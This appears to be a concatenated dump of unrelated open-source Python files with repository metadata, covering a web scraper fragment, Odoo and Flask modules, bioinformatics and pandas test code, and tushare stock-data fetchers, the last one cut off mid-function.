heads = html.xpath("//div//span/img/@src")
names = html.xpath("//strong/text()")
heads,names = if_detail_code(heads,names)
head = heads[0].replace("http","https")
name = names[0].strip()
sql = "insert into robot(weixin,name,head) values(%s,%s,%s)"
cursor.execute(sql,(weixin,name,head))
print weixin,name,head,"ok!"
time.sleep(1)
# def test2():
# url = "https://weixin.sogou.com/weixin?query=%E6%9D%8E&_sug_type_=&s_from=input&_sug_=n&type=1&page=222&ie=utf8"
# resp = requests.get(url,headers=HEADERS)
# html = etree.HTML(resp.content)
# weixins = html.xpath("//label/text()")
# print "==========================="
# print weixins
# print "==========================="
if __name__ == "__main__":
main()
cursor.close()
conn.close()
driver.close()
|
[
"1983654762@qq.com"
] |
1983654762@qq.com
|
8c8b678d13701ba585b3238bd029821548cc4783
|
f7550c4964dc8f3c59dbcebe39e947bd6a264dba
|
/1.Recorsions - 1/String into Int.py
|
49eb468cd5f79f87fb2aa7dff14c15aa4c47eb1d
|
[] |
no_license
|
Jashwanth-k/Data-Structures-and-Algorithms
|
db5e2e30932e0a35db578c19ae6cff9f147b7c3d
|
1ebf9986999a474cb094f3ab04616a46f2887043
|
refs/heads/main
| 2023-08-25T02:57:17.394322
| 2021-10-11T15:27:56
| 2021-10-11T15:27:56
| 402,448,718
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 229
|
py
|
def str_to_int(s):
l = len(s)
if l == 1:
return ord(s[0]) - ord('0')
a = str_to_int(s[1:])
b = ord(s[0]) - ord('0')
output = b*(10**(l-1)) + a
return output
s = ''
print(str_to_int(s))
|
[
"noreply@github.com"
] |
Jashwanth-k.noreply@github.com
|
2aa7e05f460ae0b7d0f6ea6a66312db082a1ce07
|
da052c0bbf811dc4c29a83d1b1bffffd41becaab
|
/core/serial_number_expired_date/models/stock_picking.py
|
6b51aa2baf397a198e54c46a84b406b3800e23da
|
[] |
no_license
|
Muhammad-SF/Test
|
ef76a45ad28ac8054a4844f5b3826040a222fb6e
|
46e15330b5d642053da61754247f3fbf9d02717e
|
refs/heads/main
| 2023-03-13T10:03:50.146152
| 2021-03-07T20:28:36
| 2021-03-07T20:28:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,983
|
py
|
# -*- coding: utf-8 -*-
import logging
from odoo import models, fields, api , _
import datetime
# from dateutil.relativedelta import relativedelta
from odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT, float_compare, float_round
class PackOperation(models.Model):
_inherit = 'stock.pack.operation.lot'
expired_date = fields.Datetime(string='Expiry Date', store=True)
class Picking(models.Model):
_inherit = "stock.picking"
def _create_lots_for_picking(self):
Lot = self.env['stock.production.lot']
for pack_op_lot in self.mapped('pack_operation_ids').mapped('pack_lot_ids'):
if not pack_op_lot.lot_id:
lot = Lot.create({'name': pack_op_lot.lot_name, 'product_id': pack_op_lot.operation_id.product_id.id, 'use_date':pack_op_lot.expired_date,'expired_date':pack_op_lot.expired_date})
pack_op_lot.write({'lot_id': lot.id})
# TDE FIXME: this should not be done here
self.mapped('pack_operation_ids').mapped('pack_lot_ids').filtered(lambda op_lot: op_lot.qty == 0.0).unlink()
create_lots_for_picking = _create_lots_for_picking
class Quant(models.Model):
_inherit = "stock.quant"
expired_date = fields.Date(related='lot_id.use_date',string='Expiry Date', store=True)
class StockProductionLot(models.Model):
_inherit = 'stock.production.lot'
expired_date = fields.Datetime(string='Expiry Date', store=True)
# Assign dates according to products data
@api.model
def create(self, vals):
dates = self._get_dates(vals.get('product_id'))
product_id = vals.get('product_id')
exp_date = vals.get('expired_date')
if exp_date:
expired_date = datetime.datetime.strptime(exp_date, DEFAULT_SERVER_DATETIME_FORMAT)
else:
expired_date = datetime.datetime.now()
product = self.env['product.product'].browse(product_id)
if product:
for d in dates.keys():
if d in ['use_date']:
date = (expired_date - datetime.timedelta(days=product.removal_time)) + datetime.timedelta(days=product.use_time)
vals['use_date'] = fields.Datetime.to_string(date)
if d in ['life_date']:
date = (expired_date - datetime.timedelta(days=product.removal_time)) + datetime.timedelta(days=product.life_time)
vals['life_date'] = fields.Datetime.to_string(date)
if d in ['alert_date']:
date = (expired_date - datetime.timedelta(days=product.removal_time)) + datetime.timedelta(days=product.alert_time)
vals['alert_date'] = fields.Datetime.to_string(date)
if d in ['removal_date']:
date = expired_date
vals['removal_date'] = fields.Datetime.to_string(date)
return super(StockProductionLot, self).create(vals)
|
[
"jbalu2801@gmail.com"
] |
jbalu2801@gmail.com
|
20dd8bac432917f44ec65e02ad42a37c002d8dc7
|
dd6c759081c1490c624de00f9519216613de5293
|
/src/ui/__init__.py
|
02186177946aec017837c2690ac545a6690800ea
|
[
"MIT"
] |
permissive
|
forcemain/SwarmOps
|
76151fd31dff5288f3bc66a24c03547c6d9bb142
|
07675b362c83ce74bae13cb1c9ee627dc4ee25ed
|
refs/heads/master
| 2021-06-18T12:41:11.960706
| 2017-05-10T01:04:44
| 2017-05-10T01:04:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,826
|
py
|
# -*- coding:utf-8 -*-
#
# SwarmOps views for ui
#
from flask import Blueprint, render_template, url_for, redirect, g, abort
from utils.public import logger, login_required
ui_blueprint = Blueprint("ui", __name__, template_folder="templates", static_folder='static')
''' swarm route'''
@ui_blueprint.route("/")
@ui_blueprint.route("/swarm/")
@login_required
def index():
return render_template("swarm/swarm.html")
@ui_blueprint.route("/swarm/add/")
@login_required
def swarm_add():
return render_template("swarm/add.html")
@ui_blueprint.route("/swarm/init/")
@login_required
def swarm_init():
return render_template("swarm/init.html")
'''service route'''
@ui_blueprint.route("/service/")
@login_required
def service():
return render_template("service/service.html")
@ui_blueprint.route("/service/delete/")
@login_required
def service_delete():
return render_template("service/delete.html")
@ui_blueprint.route("/service/update/")
@login_required
def service_update():
return render_template("service/update.html")
@ui_blueprint.route("/service/create/")
@login_required
def service_create():
return render_template("service/create.html")
@ui_blueprint.route("/service/detail/")
@login_required
def service_detail():
return render_template("service/detail.html")
@ui_blueprint.route("/service/nginx/")
@login_required
def service_nginx():
return render_template("service/nginx.html")
'''node route'''
@ui_blueprint.route("/node/")
@login_required
def node():
return render_template("node/node.html")
@ui_blueprint.route("/node/add/")
@login_required
def node_add():
return render_template("node/add.html")
@ui_blueprint.route("/node/update/")
@login_required
def node_update():
return render_template("node/update.html")
@ui_blueprint.route("/node/delete/")
@login_required
def node_delete():
return render_template("node/delete.html")
'''misc route'''
@ui_blueprint.route("/misc/")
@login_required
def misc():
return render_template("misc.html")
@ui_blueprint.route("/storage/")
@login_required
def storage():
return render_template("misc/storage.html")
'''network route'''
@ui_blueprint.route("/network/")
@login_required
def network():
return render_template("network/network.html")
'''registry route'''
@ui_blueprint.route("/registry/")
@login_required
def registry():
return render_template("registry/registry.html")
@ui_blueprint.route("/registry/<namespace>/<repository_name>/")
@login_required
def registryImageName(namespace, repository_name):
return render_template("registry/imageName.html", imageName="{}/{}".format(namespace, repository_name).replace("_/", ""))
@ui_blueprint.route("/registry/<imageId>/")
@login_required
def registryImageId(imageId):
return render_template("registry/imageId.html", imageId=imageId)
|
[
"staugur@vip.qq.com"
] |
staugur@vip.qq.com
|
b783d5bf51d4bb8dd0b44dab30f43382f53dfeb2
|
bb9ab2b88c990377e58fd2b719a60f2e4a4689ce
|
/est-sfs/01_vcf_to_estsfs.py
|
8304ae2a0ee0641c79e0ee2e8fe764171fc6c5b3
|
[] |
no_license
|
silvewheat/biocal-cli
|
7ded0e05c134c932a7dd45130c546cd607b443b9
|
134a0bf4f0d318de50a92a1e72d18c13580e64e2
|
refs/heads/master
| 2022-12-11T21:04:25.240272
| 2022-11-28T02:40:02
| 2022-11-28T02:40:02
| 147,090,111
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,551
|
py
|
# -*- coding: utf-8 -*-
"""
Created on 2022 10-14
@author: Yudongcai
@Email: yudong_cai@163.com
"""
import re
import typer
import numpy as np
from cyvcf2 import VCF
from collections import Counter, defaultdict
def convert_gts(gt_bases):
gt_split = re.compile(r'[/|]')
bases = []
for base in gt_bases:
bases.extend(gt_split.split(base))
return bases
def main(vcffile: str = typer.Argument(..., help="input vcf file"),
focalsamples: str = typer.Argument(..., help="sample list for focal samples"),
outgroup1: str = typer.Argument(..., help="sample list for outgroup1"),
outgroup2: str = typer.Argument(..., help="sample list for outgroup2"),
outgroup3: str = typer.Argument(..., help="sample list for outgroup3"),
outprefix: str = typer.Argument(..., help="output prefix")):
focal_samples = [x.strip() for x in open(focalsamples)]
outgroup1_samples = [x.strip() for x in open(outgroup1)]
outgroup2_samples = [x.strip() for x in open(outgroup2)]
outgroup3_samples = [x.strip() for x in open(outgroup3)]
samples = focal_samples + outgroup1_samples + outgroup2_samples + outgroup3_samples
print(f'focal samples: {len(focal_samples)}\noutgroup1: {len(outgroup1_samples)}\noutgroup2: {len(outgroup2_samples)}\noutgroup3: {len(outgroup3_samples)}')
with open(f'{outprefix}_siteInfo.tsv', 'w') as f1, open(f'{outprefix}_datafile', 'w') as f2:
base2index = {'A': 0, 'C': 1, 'G': 2, 'T': 3}
f1.write('CHROM\tPOS\tREF\tALT\tmajorAllele\tminorAllele\n')
vcf = VCF(vcffile, gts012=True, samples=samples)
focal_selection = [True if x in focal_samples else False for x in vcf.samples]
outgroup1_selection = [True if x in outgroup1_samples else False for x in vcf.samples]
outgroup2_selection = [True if x in outgroup2_samples else False for x in vcf.samples]
outgroup3_selection = [True if x in outgroup3_samples else False for x in vcf.samples]
outgroup_selections = (outgroup1_selection, outgroup2_selection, outgroup3_selection)
for variant in vcf:
alleles = [variant.REF] + variant.ALT
f1.write(f'{variant.CHROM}\t{variant.POS}\t{variant.REF}\t' + ','.join(variant.ALT) + '\t')
counter_gts_focal = Counter(convert_gts(variant.gt_bases[focal_selection]))
major_allele = counter_gts_focal.most_common()[0][0]
try:
minor_allele = counter_gts_focal.most_common()[1][0]
except IndexError:
minor_allele = list(set(alleles) - set(major_allele))[0]
f1.write(f'{major_allele}\t{minor_allele}\n')
f2.write(f"{counter_gts_focal.get('A', 0)},{counter_gts_focal.get('C', 0)},{counter_gts_focal.get('G', 0)},{counter_gts_focal.get('T', 0)}")
for selection in outgroup_selections:
counts = ['0', '0', '0', '0'] # A C G T
counter_gts = Counter(convert_gts(variant.gt_bases[selection])).most_common()
first_base, first_count = counter_gts[0]
try:
second_base, second_count = counter_gts[1]
except IndexError:
second_count = 0
# 两种allele数量相等时按缺失处理
if (first_count > second_count) and (first_base != '.'):
counts[base2index[first_base]] = '1'
f2.write('\t'+','.join(counts))
f2.write('\n')
if __name__ == '__main__':
typer.run(main)
|
[
"silverwheat@163.com"
] |
silverwheat@163.com
|
80c66729e6cbcb7721e17efef2dc1381872cf87d
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_minefields.py
|
9a6f4d39f05827d2da9dbb885032211575fb3e49
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 234
|
py
|
#calss header
class _MINEFIELDS():
def __init__(self,):
self.name = "MINEFIELDS"
self.definitions = minefield
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['minefield']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
df42fb81ab121a9776879d10e34a82753afc05d5
|
8cf5d738aa1bf604c1215bff0e57aef0218a5194
|
/0x1F-pascal_triangle/0-pascal_triangle.py
|
570ddb16f491d2e0ae1e2b7f26f319cb0f7f6d38
|
[] |
no_license
|
PilarPinto/holbertonschool-interview
|
3493bdb41fbc437e4dcf58db99cebcc350c2029f
|
b58bbce825426e9a15fee67dec65768f0ae0d724
|
refs/heads/master
| 2023-07-13T09:28:56.071905
| 2021-08-27T03:29:44
| 2021-08-27T03:29:44
| 281,306,960
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 472
|
py
|
#!/usr/bin/python3
'''
Module where the integers representing the Pascal’s triangle
'''
def pascal_triangle(n):
'''Pascal priniting functions'''
if n <= 0:
return []
pas_r = [[1]]
if n > 1:
pas_r.append([1, 1])
for ind in range(3, n + 1):
pas_r.append([1] + list(map(
lambda i: pas_r[ind - 2][i] + pas_r[ind - 2][i + 1], range(
len(pas_r[ind - 2]) - 1))) + [1])
return pas_r
|
[
"piapintoch@unal.edu.co"
] |
piapintoch@unal.edu.co
|
f10521bec9c35ed9de1f626cde80d9f4c3eccfd2
|
3b5c46ce2daa75e1e157838d0f6cfd92469471a0
|
/plastering/inferencers/scrabble/ground_truth_gen.py
|
06262e23e98f035aa786f957245812f56a341b1c
|
[
"MIT"
] |
permissive
|
plastering/plastering
|
1b4e9c04fce4b26b22fe5ade05af9baf644b4eaa
|
26ffeecb38844ebb122fde5d9bd2276a7b4150a0
|
refs/heads/master
| 2023-04-04T07:50:59.087529
| 2021-05-17T23:31:40
| 2021-05-17T23:31:40
| 149,086,461
| 37
| 17
|
MIT
| 2023-03-24T23:19:24
| 2018-09-17T07:32:17
|
Python
|
UTF-8
|
Python
| false
| false
| 3,069
|
py
|
import pdb
import json
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(choices=['ap_m','ebu3b', 'bml'], dest='building')
args = parser.parse_args()
import pandas as pd
from brick_parser import equipTagsetList as equip_tagsets, \
locationTagsetList as location_tagsets,\
pointSubclassDict as point_subclass_dict,\
equipSubclassDict as equip_subclass_dict,\
locationSubclassDict as location_subclass_dict
subclass_dict = dict()
subclass_dict.update(point_subclass_dict)
subclass_dict.update(equip_subclass_dict)
subclass_dict.update(location_subclass_dict)
subclass_dict['networkadapter'] = list()
subclass_dict['none'] = list()
subclass_dict['unknown'] = list()
building = args.building
sensor_df = pd.read_csv('metadata/{0}_sensor_types_location.csv'\
.format(building)).set_index('Unique Identifier')
with open('metadata/{0}_label_dict_justseparate.json'\
.format(building), 'r') as fp:
label_dict = json.load(fp)
with open('metadata/{0}_sentence_dict_justseparate.json'\
.format(building), 'r') as fp:
sentence_dict = json.load(fp)
nonpoint_tagsets = equip_tagsets + location_tagsets + ['networkadapter']
def find_nonpoint_tagsets(tagset):
if tagset.split('-')[0] in nonpoint_tagsets:
return tagset
else:
return ''
truth_dict = dict()
for srcid, label_list in label_dict.items():
sentence = sentence_dict[srcid]
phrase_list = list()
truth_list = list()
sentence_meanings = [(token,label)
for token, label
in zip(sentence, label_list)
if label not in ['none', 'unknown']]
right_identifier_buffer = ''
for (token, label) in sentence_meanings:
if label=='leftidentifier':
# phrase_list[-1] += ('-' + token)
continue
elif label=='rightidentifier':
# right_identifier_buffer += token
continue
phrase_list.append(label)
if right_identifier_buffer:
phrase_list[-1] += ('-' + right_identifier_buffer)
truth_list = [phrase
for phrase
in phrase_list
if find_nonpoint_tagsets(phrase)]
removing_tagsets = list()
for tagset in truth_list:
subclasses = subclass_dict[tagset.split('-')[0]]
if sum([True if tagset in subclasses else False
for tagset in truth_list]) > 1:
removing_tagsets.append(tagset)
for tagset in removing_tagsets:
truth_list = list(filter(tagset.__ne__, truth_list))
try:
truth_list.append(sensor_df['Schema Label'][srcid].replace(' ', '_'))
except:
print(srcid, 'failed')
truth_dict[srcid] = list(set(truth_list))
# TODO: add all labels to a dict (except point type info)
with open('metadata/{0}_ground_truth.json'.format(building), 'w') as fp:
json.dump(truth_dict, fp, indent=2)
|
[
"bk7749@gmail.com"
] |
bk7749@gmail.com
|
12e23d45d86604712c62c27d9d5d24bbd21d6e2f
|
c325866c577343752f0d4394c3d96e599674df0e
|
/models/nosis_configuracion.py
|
b133bf8a84cf2a4d4f2ff5dd7f1a714f0cc0ee4e
|
[] |
no_license
|
levislibra/financiera_nosis
|
ff11f4f8417917d48220d40c1524f91d5f1a4d24
|
3227e9258e2f8519880081232070734e929af3f8
|
refs/heads/master
| 2023-01-05T20:23:01.509995
| 2022-12-22T18:33:05
| 2022-12-22T18:33:05
| 236,527,122
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,340
|
py
|
# -*- coding: utf-8 -*-
from openerp import models, fields, api
from datetime import datetime, timedelta
from dateutil import relativedelta
from openerp.exceptions import UserError, ValidationError
import time
import requests
ENDPOINT_NOSIS = 'https://ws01.nosis.com/rest/variables'
class FinancieraNosisConfiguracion(models.Model):
_name = 'financiera.nosis.configuracion'
name = fields.Char('Nombre')
usuario = fields.Char('Usuario')
token = fields.Char('Token')
id_informe = fields.Integer('Id proximo informe', default=1)
id_cuestionario = fields.Integer('Id proximo cuestionario', default=1)
ejecutar_cda_al_solicitar_informe = fields.Boolean('Ejecutar CDAs al solicitar informe')
solicitar_informe_enviar_a_revision = fields.Boolean('Solicitar informe al enviar a revision')
vr = fields.Integer('Grupo de variables')
nro_grupo_vid = fields.Integer('Grupo VID')
nro_grupo_vid2 = fields.Integer('Grupo VID 2do intento')
nosis_variable_1 = fields.Char('Variable 1')
nosis_variable_2 = fields.Char('Variable 2')
nosis_variable_3 = fields.Char('Variable 3')
nosis_variable_4 = fields.Char('Variable 4')
nosis_variable_5 = fields.Char('Variable 5')
asignar_nombre_cliente = fields.Boolean('Asignar Nombre al cliente')
asignar_nombre_cliente_variable = fields.Char('Variable para el Nombre', default='VI_RazonSocial')
asignar_direccion_cliente = fields.Boolean('Asignar Direccion al cliente')
asignar_calle_cliente_variable = fields.Char('Variable para la calle', default='VI_DomAF_Calle')
asignar_nro_cliente_variable = fields.Char('Variable para el Nro', default='VI_DomAF_Nro')
asignar_piso_cliente_variable = fields.Char('Variable para el Piso', default='VI_DomAF_Piso')
asignar_departamento_cliente_variable = fields.Char('Variable para el Departamento', default='VI_DomAF_Dto')
asignar_ciudad_cliente = fields.Boolean('Asignar Ciudad a direccion')
asignar_ciudad_cliente_variable = fields.Char('Variable para la ciudad', default='VI_DomAF_Loc')
asignar_cp_cliente = fields.Boolean('Asignar CP a direccion')
asignar_cp_cliente_variable = fields.Char('Variable para el CP', default='VI_DomAF_CP')
asignar_provincia_cliente = fields.Boolean('Asignar Provincia a direccion')
asignar_provincia_cliente_variable = fields.Char('Variable para la Provincia', default='VI_DomAF_Prov')
asignar_identificacion_cliente = fields.Boolean('Asignar identificacion al cliente')
asignar_identificacion_cliente_variable = fields.Char('Variable para la identificacion', default='VI_Identificacion')
asignar_genero_cliente = fields.Boolean('Asignar genero al cliente')
asignar_genero_cliente_variable = fields.Char('Variable para genero', default='VI_Sexo')
company_id = fields.Many2one('res.company', 'Empresa', required=False, default=lambda self: self.env['res.company']._company_default_get('financiera.nosis.configuracion'))
@api.one
def test_conexion(self):
params = {
'usuario': self.usuario,
'token': self.token,
}
response = requests.get(ENDPOINT_NOSIS, params)
if response.status_code == 400:
raise UserError("La cuenta esta conectada.")
else:
raise UserError("Error de conexion.")
class ExtendsResCompany(models.Model):
_name = 'res.company'
_inherit = 'res.company'
nosis_configuracion_id = fields.Many2one('financiera.nosis.configuracion', 'Configuracion Nosis')
|
[
"levislibra@hotmail.com"
] |
levislibra@hotmail.com
|
563eba447c671fd512d395f592dacda7801a7acf
|
1b9075ffea7d4b846d42981b41be44238c371202
|
/2008/devel/applications/office/abiword/actions.py
|
e75fb6419d91ba18ae0f32bc78933b9d14e7ebfc
|
[] |
no_license
|
pars-linux/contrib
|
bf630d4be77f4e484b8c6c8b0698a5b34b3371f4
|
908210110796ef9461a1f9b080b6171fa022e56a
|
refs/heads/master
| 2020-05-26T20:35:58.697670
| 2011-07-11T11:16:38
| 2011-07-11T11:16:38
| 82,484,996
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 848
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 2
# See the file http://www.gnu.org/copyleft/gpl.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import get
def setup():
autotools.configure("--with-x \
--with-ImageMagick \
--with-libxml2 \
--with-zlib \
--with-libpng \
--with-popt \
--enable-printing \
--enable-gnomeui")
def build():
autotools.make()
def install():
autotools.rawInstall("DESTDIR=%s" % get.installDIR())
pisitools.dodoc("docs/Abi*", "docs/NonLatin1UnixLocales.abw")
|
[
"MeW@a748b760-f2fe-475f-8849-a8a11d7a3cd2"
] |
MeW@a748b760-f2fe-475f-8849-a8a11d7a3cd2
|
c805b342485e670743486773449b5dfe5ee5d797
|
5c269629ca7d5ffb3a6035d056ae88f90fd8153a
|
/pandas/tests/series/test_dtypes.py
|
6864eac603ded8a41a02dd6bd6d298bf10d41607
|
[
"BSD-3-Clause",
"LicenseRef-scancode-other-permissive",
"BSD-2-Clause"
] |
permissive
|
bdrosen96/pandas
|
416e5cb1941b21cee38a30346056a257b7d2b0ce
|
506520bd35331aa82db50686c07d96594cac0c10
|
refs/heads/master
| 2021-01-15T09:20:22.851970
| 2016-07-19T02:06:18
| 2016-07-19T02:06:23
| 63,601,381
| 0
| 0
|
NOASSERTION
| 2019-11-21T13:08:56
| 2016-07-18T12:31:49
|
Python
|
UTF-8
|
Python
| false
| false
| 5,127
|
py
|
# coding=utf-8
# pylint: disable-msg=E1101,W0612
import sys
from datetime import datetime
import string
from numpy import nan
import numpy as np
from pandas import Series
from pandas.tseries.index import Timestamp
from pandas.tseries.tdi import Timedelta
from pandas.compat import lrange, range, u
from pandas import compat
from pandas.util.testing import assert_series_equal
import pandas.util.testing as tm
from .common import TestData
class TestSeriesDtypes(TestData, tm.TestCase):
_multiprocess_can_split_ = True
def test_astype(self):
s = Series(np.random.randn(5), name='foo')
for dtype in ['float32', 'float64', 'int64', 'int32']:
astyped = s.astype(dtype)
self.assertEqual(astyped.dtype, dtype)
self.assertEqual(astyped.name, s.name)
def test_dtype(self):
self.assertEqual(self.ts.dtype, np.dtype('float64'))
self.assertEqual(self.ts.dtypes, np.dtype('float64'))
self.assertEqual(self.ts.ftype, 'float64:dense')
self.assertEqual(self.ts.ftypes, 'float64:dense')
assert_series_equal(self.ts.get_dtype_counts(), Series(1, ['float64']))
assert_series_equal(self.ts.get_ftype_counts(), Series(
1, ['float64:dense']))
def test_astype_cast_nan_int(self):
df = Series([1.0, 2.0, 3.0, np.nan])
self.assertRaises(ValueError, df.astype, np.int64)
def test_astype_cast_object_int(self):
arr = Series(["car", "house", "tree", "1"])
self.assertRaises(ValueError, arr.astype, int)
self.assertRaises(ValueError, arr.astype, np.int64)
self.assertRaises(ValueError, arr.astype, np.int8)
arr = Series(['1', '2', '3', '4'], dtype=object)
result = arr.astype(int)
self.assert_series_equal(result, Series(np.arange(1, 5)))
def test_astype_datetimes(self):
import pandas.tslib as tslib
s = Series(tslib.iNaT, dtype='M8[ns]', index=lrange(5))
s = s.astype('O')
self.assertEqual(s.dtype, np.object_)
s = Series([datetime(2001, 1, 2, 0, 0)])
s = s.astype('O')
self.assertEqual(s.dtype, np.object_)
s = Series([datetime(2001, 1, 2, 0, 0) for i in range(3)])
s[1] = np.nan
self.assertEqual(s.dtype, 'M8[ns]')
s = s.astype('O')
self.assertEqual(s.dtype, np.object_)
def test_astype_str(self):
# GH4405
digits = string.digits
s1 = Series([digits * 10, tm.rands(63), tm.rands(64), tm.rands(1000)])
s2 = Series([digits * 10, tm.rands(63), tm.rands(64), nan, 1.0])
types = (compat.text_type, np.str_)
for typ in types:
for s in (s1, s2):
res = s.astype(typ)
expec = s.map(compat.text_type)
assert_series_equal(res, expec)
# GH9757
# Test str and unicode on python 2.x and just str on python 3.x
for tt in set([str, compat.text_type]):
ts = Series([Timestamp('2010-01-04 00:00:00')])
s = ts.astype(tt)
expected = Series([tt('2010-01-04')])
assert_series_equal(s, expected)
ts = Series([Timestamp('2010-01-04 00:00:00', tz='US/Eastern')])
s = ts.astype(tt)
expected = Series([tt('2010-01-04 00:00:00-05:00')])
assert_series_equal(s, expected)
td = Series([Timedelta(1, unit='d')])
s = td.astype(tt)
expected = Series([tt('1 days 00:00:00.000000000')])
assert_series_equal(s, expected)
def test_astype_unicode(self):
# GH7758
# a bit of magic is required to set default encoding encoding to utf-8
digits = string.digits
test_series = [
Series([digits * 10, tm.rands(63), tm.rands(64), tm.rands(1000)]),
Series([u('データーサイエンス、お前はもう死んでいる')]),
]
former_encoding = None
if not compat.PY3:
# in python we can force the default encoding for this test
former_encoding = sys.getdefaultencoding()
reload(sys) # noqa
sys.setdefaultencoding("utf-8")
if sys.getdefaultencoding() == "utf-8":
test_series.append(Series([u('野菜食べないとやばい')
.encode("utf-8")]))
for s in test_series:
res = s.astype("unicode")
expec = s.map(compat.text_type)
assert_series_equal(res, expec)
# restore the former encoding
if former_encoding is not None and former_encoding != "utf-8":
reload(sys) # noqa
sys.setdefaultencoding(former_encoding)
def test_complexx(self):
# GH4819
# complex access for ndarray compat
a = np.arange(5, dtype=np.float64)
b = Series(a + 4j * a)
tm.assert_numpy_array_equal(a, b.real)
tm.assert_numpy_array_equal(4 * a, b.imag)
b.real = np.arange(5) + 5
tm.assert_numpy_array_equal(a + 5, b.real)
tm.assert_numpy_array_equal(4 * a, b.imag)
|
[
"jeff@reback.net"
] |
jeff@reback.net
|
f982f49bded21d3ec480ed23147785cb1e622b6f
|
e4007870b4d75ba23c2f12ac6646f272cf17865c
|
/Types/Detection_3D.py
|
33c52d337085600db6cc52e4e9c38d9631902223
|
[
"MIT"
] |
permissive
|
knut0815/PythonUtility
|
385ce332ff34501be7ad21ac7948eb609770e72a
|
0062e1e60dc151776b963d13bc4c1763eb90d333
|
refs/heads/master
| 2023-01-10T09:58:14.619531
| 2020-11-10T12:22:47
| 2020-11-10T12:22:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,453
|
py
|
import numpy as np
from Utility.Classes.Frozen_Class import FrozenClass
class Detection3D(FrozenClass):
def __init__(self, frame, track_id, detection_type, truncation, occlusion, obs_angle, bbox, dimensions, location, rotation_y, score):
self.frame = frame
self.track_id = track_id
# detection_type: 'Car', 'Van', 'Truck', 'Pedestrian', 'Person_sitting', 'Cyclist', 'Tram', 'Misc' or 'DontCare'
self.detection_type = detection_type
# truncated: Float from 0 (non-truncated) to 1 (truncated)
self.truncation = truncation
# occluded: integer (0,1,2,3) indicating occlusion state:
# 0 = fully visible, 1 = partly occluded, 2 = largely occluded, 3 = unknown
self.occlusion = occlusion
# bservation angle of object, ranging [-pi..pi]
self.obs_angle = obs_angle
# 2D bounding box of object in the image (0-based index): contains left, top, right, bottom pixel coordinates
self.bbox = bbox
# 3D object dimensions: height, width, length (in meters)
self.dimensions = dimensions
# 3D object location x,y,z in camera coordinates (in meters)
self.location = location
# Rotation ry around Y-axis in camera coordinates [-pi..pi]
self.rotation_y = rotation_y
self.score = score
@classmethod
def from_string_list(cls, string_list):
return cls(
frame=int(float(string_list[0])), # frame
track_id=int(float(string_list[1])), # id
detection_type=string_list[2].lower(), # object type [car, pedestrian, cyclist, ...]
truncation=float(string_list[3]), # truncation [0..1]
occlusion=int(float(string_list[4])), # occlusion [0,1,2]
obs_angle=float(string_list[5]), # observation angle [rad]
bbox=np.array([float(string_list[6]), float(string_list[7]), float(string_list[8]), float(string_list[9])], dtype=float), # left [px], top [px], right [px], bottom [px]
dimensions=np.array([float(string_list[10]), float(string_list[11]), float(string_list[12])], dtype=float), # height [m], width [m], length [m]
location=np.array([float(string_list[13]), float(string_list[14]), float(string_list[15])], dtype=float), # X [m]
rotation_y=float(string_list[16]), # yaw angle [rad]
score=float(string_list[17]) if len(string_list) >= 18 else None
)
|
[
"sebastian.bullinger@iosb.fraunhofer.de"
] |
sebastian.bullinger@iosb.fraunhofer.de
|
b649bb21ea563e3765210bd62d99d5b730a5b950
|
8fb2668de046fb47ffb3e0964746b400e75b7c83
|
/crawl/fake_spider/tushare/kData.py
|
79515c39159d08946ce04bb198cc6e7d8deaf6af
|
[] |
no_license
|
reinhardtken/backtest-py
|
5d8f080861851882d954f4bb944a8d374220498e
|
6d14b10918c018081ab228030d2b3ac38eea267c
|
refs/heads/master
| 2020-12-06T17:01:33.284011
| 2020-02-11T15:07:42
| 2020-02-11T15:07:42
| 232,512,884
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,473
|
py
|
# -*- encoding: utf-8 -*-
# sys
import json
import datetime
# thirdpart
import pandas as pd
import tushare as ts
from pymongo import MongoClient
# this project
##########################
import util.crawl as util
import const.crawl as const
#http://tushare.org/classifying.html#id8
# code :股票代码
# name :股票名称
# date :日期
# weight:权重
def getLastK(code):
end = util.today().strftime('%Y-%m-%d')
start = util.weekAgo().strftime('%Y-%m-%d')
try:
df = ts.get_k_data(code, start=start, end=end)
df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'])
df.set_index('date', inplace=True)
df.drop('code', axis=1, inplace=True)
return df
except Exception as e:
print(e)
def getKData(code, starts='2001-01-01'):
try:
df = ts.get_k_data(code, start=starts, index=False)
df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'])
df.set_index('date', inplace=True)
df.drop('code', axis=1, inplace=True)
return df
except Exception as e:
print(e)
def getKDataRecent(code):
try:
now = datetime.datetime.now()
starts = now - datetime.timedelta(days=15)
starts = starts.strftime('%Y-%m-%d')
df = ts.get_k_data(code, start=starts, index=False)
df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'])
df.set_index('date', inplace=True)
df.drop('code', axis=1, inplace=True)
return df
except Exception as e:
print(e)
def getKDataNoneRecent(code):
try:
now = datetime.datetime.now()
starts = now - datetime.timedelta(days=15)
starts = starts.strftime('%Y-%m-%d')
